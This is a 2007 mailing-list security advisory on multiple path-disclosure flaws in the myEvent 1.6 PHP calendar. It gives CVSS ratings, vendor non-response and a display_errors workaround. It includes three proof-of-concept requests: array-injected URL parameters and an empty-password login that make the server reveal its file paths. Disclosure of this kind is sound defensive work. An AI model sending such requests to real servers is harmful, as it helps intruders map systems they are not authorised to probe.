'[Full-disclosure] myEvent version 1.6 Multiple Path Disclosure'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [Full-disclosure] myEvent version 1.6 Multiple Path Disclosure
From:       "SecurityResearch" <securityresearch () netvigilance ! com>
Date:       2007-05-28 19:53:41
Message-ID: 012FDE7DE21D97498794A72AEEF90D7F06A576 () beaverton ! portland ! local
[Download RAW message or body]

netVigilance Security Advisory #24

myEvent version 1.6 Multiple Path Disclosure Vulnerabilities 

Description:
myEvent is Dynamic Calendar based Events Management system with admin panel for adding events, \
edit and delete built using PHP & mySQL. Display today's event and future events links on the \
calendar, Event will be displayed in 3 mode eg : pop-up, new windows and on same screen once \
link is clicked. There is also a mouse-over tool tip to display the events Template based and \
Simple easily intergrated to any websites.

External References: 
Mitre CVE:  CVE-2007-0690
NVD NIST: CVE-2007-0690
OSVDB: 34272

Summary: 
myEvent is Dynamic Calendar based Events Management system with admin panel for adding events, \
edit and delete built using PHP and mySQL. Multiple pass disclosure vulnerabilities in the \
product allow attackers to gather the true path of the server-side script.

Advisory URL: 
http://www.netvigilance.com/advisory0024 

Release Date:
05/28/2007 

Severity:
Risk: Low
 
CVSS Metrics
Access Vector: Remote
Access Complexity: Low
Authentication: Not-required
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
Impact Bias: Normal
CVSS Base Score: 2.3
 
Target Distribution on Internet: Low
 
Exploitability: Functional Exploit
Remediation Level: Workaround
Report Confidence: Uncorroborated
 
Vulnerability Impact: Attack
Host Impact: Path disclosure.

SecureScout Testcase ID:
TC 17954

Vulnerable Systems:
myEvent version 1.6

Vulnerability Type:
Program flaw - The myevent.php and login.php scripts has flaws which lead to Warnings or even \
Fatal Error.

Vendor:
myWebland

Vendor Status: 
The Vendor has been notified several times on many different email addresses last on 15 May \
2007. The Vendor has not responded. There is no official fix at the release of this Security \
Advisory.

Workaround:
Disable warning messages: modify in the php.ini file following line: display_errors = Off. Or \
modify .htaccess file (this will work only for the apache servers). 

Example: 
Path Disclosure Vulnerability 1:
REQUEST:
http://[TARGET]/[PRODUCT-DIRECTORY]/myevent.php?monthno[]=2&year=2007
REPLY:
<b>Warning</b>:  htmlspecialchars() expects parameter 1 to be string, array given in \
<b>[DISCLOSED PATH]\[PRODUCT-DIRECTORY]\initialize.php</b> on line <b>71</b><br />
Path Disclosure Vulnerability 2:
REQUEST
http://[TARGET]/[PRODUCT-DIRECTORY]/ myevent.php?view[]=1
REPLY:
<b>Warning</b>:  htmlspecialchars() expects parameter 1 to be string, array given in \
<b>[DISCLOSED PATH]\[PRODUCT-DIRECTORY]initialize.php</b> on line <b>83</b><br />
Path Disclosure Vulnerability 3:
REQUEST:
http://[TARGET]/[PRODUCT-DIRECTORY]/login.php
Enter Login but do not enter password. Click "Log In"
REPLY:
<b>Fatal error</b>:  Call to undefined function:  notice() in <b>[DISCLOSED \
PATH]\[PRODUCT-DIRECTORY]\login.php</b> on line <b>29</b><br />

Credits: 
Jesper Jurcenoks
Co-founder netVigilance, Inc
www.netvigilance.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic